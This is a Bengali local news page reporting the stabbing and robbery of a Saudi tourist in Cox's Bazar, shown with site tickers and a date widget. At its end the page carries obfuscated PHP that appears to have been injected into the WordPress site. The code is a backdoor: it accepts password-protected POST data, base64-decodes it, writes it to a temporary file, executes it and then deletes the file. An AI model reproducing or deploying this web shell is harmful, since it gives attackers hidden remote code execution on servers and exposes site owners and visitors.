• বুধবার, ১৯ জুন ২০২৪, ১০:৩১ অপরাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

কক্সবাজারে বিদেশী পর্যটক কে ছুরিকাঘাত

শহর প্রতিনিধি :
আপডেট : শনিবার, ২ ডিসেম্বর, ২০২৩


শহর প্রতিনিধি :


কক্সবাজার শহরে এক বিদেশী পর্যটককে ছুরিকাঘাত করেছে ছিনতাইকারীরা। এসময় তার কাছ থেকে নগদ টাকা ও মোবাইল ফোন ছিনিয়ে নিয়ে যায় দুর্বৃত্তরা।

শুক্রবার (১ ডিসেম্বর) রাতে সাড়ে ১১ টায় শহরের কলাতলীর ডলফিন মোড়ে এ ঘটনা ঘটে। আহত পর্যটকের নাম আব্দুল খালেক। তিনি সৌদি আরবের নাগরিক বলে জানিয়েছেন। তার সাথে থাকা দোভাষী ফরিদপুরের বাসিন্দা সৌদি প্রবাসী রাকিব জানান, দুটি মোটর সাইকেলে করে ৬ জন দুর্বৃত্ত এসে খালেককে ছুরিকাহত করে মোবাইল ও নগদ টাকা নিয়ে দ্রুত স্থান ত্যাগ করে। এসময় তার মোবাইলও দুর্বৃত্তরা নিয়ে যায়।

কক্সবাজার সদর হাসপাতালে চিকিৎসাধীন আছেন আহত পর্যটক খালেক। নাম বলতে না চাওয়া হাসপাতালের চিকিৎসক জানান, আহত ব্যক্তিকে চিকিৎসা দেয়া হচ্ছে। তবে রক্তপাত বেশি হয়েছে।

হাসপাতালে কথা হয় আহত পর্যটকের সাথে থাকা রাকিবের বন্ধু ঢাকার মিরপুরের বাসিন্দা মম নূরের সাথে। তিনি জানান, ডলফিন মোড়ে বিশ্ববিদ্যালয়ের সামনে চা খেয়ে আড্ডা দিচ্ছিলেন তারা। অন্য এক পাশে ছিলেন আহত পর্যটক খালেক আর রাকিব। তাদের চিৎকারে দৌড়ে এসে দেখেন ছুরিকাহত হয়ে পড়ে আছেন খালেক। তখন তারা আহতকে হাসপাতালে নিয়ে আসেন।

এদিকে রাতেই এ ঘটনার পর ঘটনাস্থলে দেখা গেছে পুলিশ সুপার মাহফুজুল ইসলামকে। এসময় তিনি দ্রুত এঘটনার কারন উদঘাটন করা হবে বলে জানান।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বুধবার (রাত ১০:৩১)
  • ১৯শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৩ই জিলহজ, ১৪৪৫ হিজরি
  • ৫ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}